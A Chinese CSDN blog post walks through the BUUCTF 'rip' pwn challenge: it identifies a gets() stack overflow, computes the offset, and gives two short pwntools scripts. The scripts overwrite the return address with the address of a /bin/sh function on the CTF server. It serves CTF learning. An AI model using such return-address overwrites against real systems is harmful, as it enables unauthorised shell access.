buuctf-rip

最新推荐文章于 2024-07-19 15:41:30 发布
最新推荐文章于 2024-07-19 15:41:30 发布
阅读量359 收藏 4
点赞数 4
分类专栏: Pwn buuctf 文章标签: linux 运维 服务器 buuctf pwn
加油加油~
本文链接:https://blog.csdn.net/wcj126/article/details/139664219
版权
buuctf 同时被 2 个专栏收录
28 篇文章 1 订阅
订阅专栏
Pwn
7 篇文章 1 订阅
订阅专栏

偶尔学学pwn,感觉re到了后面不可避免学pwn

先执行程序

看一下文件保护

file 和checksec指令

二进制的保护机制 (mamicode.com)

目前我也不会啥,这个 no cannary 就是我需要学的 没有栈溢出的保护

IDA 64打开附件

 这就是我们的链接靶机看见的

然后我看wp说,我们要利用bin/sh获取shell权限

在fun函数这里,可以看见执行这个fun函数就可以了

总体思路 利用get来得到栈溢出的目的,在溢出中加入fun的返回地址,达到获取交互界面的权限

栈溢出思路:

查看S有多少个

        

15个

又因为是64为,我们要加上8字节(类似于平衡堆栈最后返回地址,如果是32位,我们要加上4字节)

 地址

exp

BUUCTF pwn题 rip_buuctfrip-CSDN博客

from pwn import *
ghust = remote("node5.buuoj.cn",25521)
addr = 0x40118a
payload = b'A' * 15 + b'B'*8 + p64(addr)
ghust.sendline(payload)
ghust.interactive()

BUUCTF PWN-RIP详解_buuctf rip-CSDN博客 


from pwn import *

#p = process('./pwn1')
p = remote('node5.buuoj.cn', 25521)
payload='A'*23+'B'*8+p64(0x401186+1).decode()

p.sendline(payload)
p.interactive()

 

_Nickname
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
BUUCTF-rip 尝试PWN入门
brightendavid的博客
05-04 1525
BUUCTF-rip 拿到的是一个什么呢,感觉是一个小系统? 但是也就是一个小程序嘛。 这个程序就是执行一个输入输出 的命令。但是这里面存在漏洞。 这个s是15byte的字符 在fun部分有一个/bin/sh 这个据说是一个系统级函数,为什么说是系统级函数呢,因为有一个system吧。 一般会是什么用都没有。 但是在使用这样的一个payload后,就可以利用,也不知道这个pwn 库是做了什么。感觉像是变魔术。要刚好把堆栈覆盖到这个系统函数的位置?是不是这个解释呢。 #python3 需要预先安
win7-32位安装Linotronic 530-RIP 30 v52.3.rar
07-31
《在Windows 7 32位系统中安装Linotronic 530-RIP 30 v52.3的详细指南》 在数字印刷领域,RIP(Raster Image Processor,光栅图像处理器)扮演着至关重要的角色。Linotronic 530-RIP 30 v52.3是一款专业的RIP软件,...
BUUCTF-rip
m0_64180167的博客
04-11 663
看了这个文章 我起码能理解我们栈溢出的目的在做题之前 我们需要先理解栈的存储方法从上往下看 就能理解入栈说回这道题目为什么这道题目是栈溢出。
PWN学习记录(2)BUUCTF-rip
m0_58824086的博客
07-31 266
gets函数的缓冲区是由用户本身提供,由于用户无法指定一次最多可读入多少字节,导致此函数存在巨大安全隐患。换句话来说,就是gets若没有遇到\n 结束,则会无限读取,没有上限。由**char s[15]**可得,在main函数的栈帧中,划分了一个15字节的存储空间,也就是说只需要存入15个字节地址,就可以get函数返回地址。可以发现,这是一个64位的ELF文件,可得每个存储单元是8个字节,即一个字节是8位,同理32位就是4个字节。dup():重复定义圆括号中指定的初值,次数由前面的数值决定。
BUUCTF -rip
weixin_56301399的博客
07-20 389
用IDAPro64bit打开pwn1后按F5反汇编源码并查看主函数,发现gets()函数读取输入到变量s中,s的长度只有0xf,即可用栈大小只有15字节,但是gets()函数并没有限制输入,显然存在栈溢出漏洞。先file./pwn1查看文件类型再checksec--file=pwn1检查一下文件保护情况。且fun()函数的起始地址为0x401186。得到信息64位,各项保护都未开启。......
计算机网络实验-RIP实验报告.pdf
04-21
RIP实验报告,计算机网络实验 如果拓扑图如图 11-7 所示,应该如何配置才能使所有 PC 机相互通信? 如果是 3 个路由器组成的拓扑图如图 11-8 所示,应该如何配置才能使 所有 PC 机相互通信?
思科-RIP的基础配置
04-07
内容概要:配置RIP动态路由和默认路由,使用相应的RIP和静态两种路由协议实现网络的互通,加深对动态路由能够减少一定的配置量这一规律的理解。 适合人群:初学路由交换技术的学生、或者对路由交换与交换的人群。 ...
华为模拟器eNSP练习题-RIP
01-04
【华为模拟器eNSP与RIP协议详解】 在IT领域,华为eNSP(Enterprise Network Simulation Platform)是一款强大的网络仿真工具,它允许用户在虚拟环境中构建和测试网络配置,以便学习和验证网络技术。本实验主要围绕...
IP路由-RIP与静态路由-重复布.docx
02-24
IP 路由-RIP 与静态路由-重复布 本文档介绍了 IP 路由的配置,包括 RIP 路由和静态路由的配置,重点介绍了 RIP 路由协议的配置和静态路由的配置,以及它们之间的重发布机制。 一、网络拓扑环境 本文档的网络拓扑...
LINUX:懒汉单例模式线程池
W2155的博客
07-16 446
创建一个线程,就是要这个线程去完成某种任务的。池化技术就是,提前创建一批线程,有任务这一批线程就会执行。而不是有任务的时候在去创建线程。池化技术有着更高的效率,因为线程都是提前创建好的,直接执行任务。
定制 Linux 内核的意义
地球空间
07-17 287
2. **配置内核**:使用 `make menuconfig` 或 `make xconfig` 配置内核,选择需要支持的硬件和功能。1. **性能优化**:通过定制内核,可以针对特定的硬件或应用场景优化性能,比如减少不必要的驱动支持、优化调度算法等。7. **持续维护**:随着时间的推移,可能需要对内核进行更新和维护,以支持新的硬件和功能。6. **测试和调试**:启动系统,测试新内核的功能和性能,根据需要进行调试和优化。4. **安装内核**:编译完成后,将生成的内核镜像和相关的模块安装到系统中。
Qmi8658a姿态传感器使用心得(2)linux
Starry的博客
07-19 858
COD 原理,CTRL9,自检(详细代码示例)
文件在Linux下为binary格式在Windows下为utf-8格式
qq_38220334的博客
07-17 326
想着是不是之前遇到的问题,有可能是文件中含有特殊字符,然后用vim命令来编辑这个文件,发现,还真是含有一个特殊字符,然后将它删除掉,文件就变成utf-8格式的文件了。在Windows下和Mac下都是没有问题的,在华为云服务器上也是没问题的(操作系统不是centos),但是在自己搭建的Linux服务器(centos)上是有问题的。用shell或者Python脚本去将这个文件转为utf-8格式的,但是都失败了。
Linux 注意事项
最新发布
m0_74012211的博客
07-19 324
Linux 与 Windows 是两个相互独立的操作系统,两者有较大差距
Linux】深入探索`cp`命令:文件复制的全面指南
lph159的博客
07-18 337
cp命令用于复制文件或目录的内容。cp [选项] 源文件 目标文件或目录使用cp命令可以在文件系统中创建新的副本,无论是单个文件还是整个目录树。接下来我们将详细介绍cp命令的各个选项及其用法。
Linux】文件管理常用命令【超详细】
2301_82023330的博客
07-16 721
这篇博客介绍了Linux系统中的常用文件管理命令,包括`ls`、`cd`、`cp`、`mv`、`rm`和`mkdir`等。通过这些命令,用户可以高效地浏览目录、复制和移动文件、删除文件以及创建新目录。文章详细讲解了每个命令的基本用法和常见选项,并通过实例演示了这些命令在实际操作中的应用,帮助读者掌握文件管理的基本技能,提升Linux系统的使用效率。
单链表算法 - 环形链表II
黎相思的技术博客
07-17 450
- 备战技术面试?力扣提供海量技术面试资源,帮助你高效提升编程技能,轻松拿下世界 IT 名企 Dream Offer。那么为什么相遇点和头节点到入环节点的距离是相等的。. - 力扣(LeetCode)
BUUCTF pwn rip
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP详解主要讲解了如何利用RIP寄存器来进行PWN攻击。RIP寄存器是存储下一条指令的地址,通过控制RIP寄存器的值,可以改变程序的执行流程,从而实现攻击的目的。 PWN攻击是一种利用软件漏洞来获取对计算机系统的控制权的攻击方式。在PWN攻击中,攻击者通常会利用程序中的漏洞,通过输入特定的数据来改变程序的执行流程,从而实现攻击的目的。 BUUCTF PWN-RIP详解文章提供了一些示例和技巧,帮助读者理解和掌握PWN攻击中利用RIP寄存器的方法。如果你对PWN攻击感兴趣,可以阅读该文章以获取更多详细信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

_Nickname

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值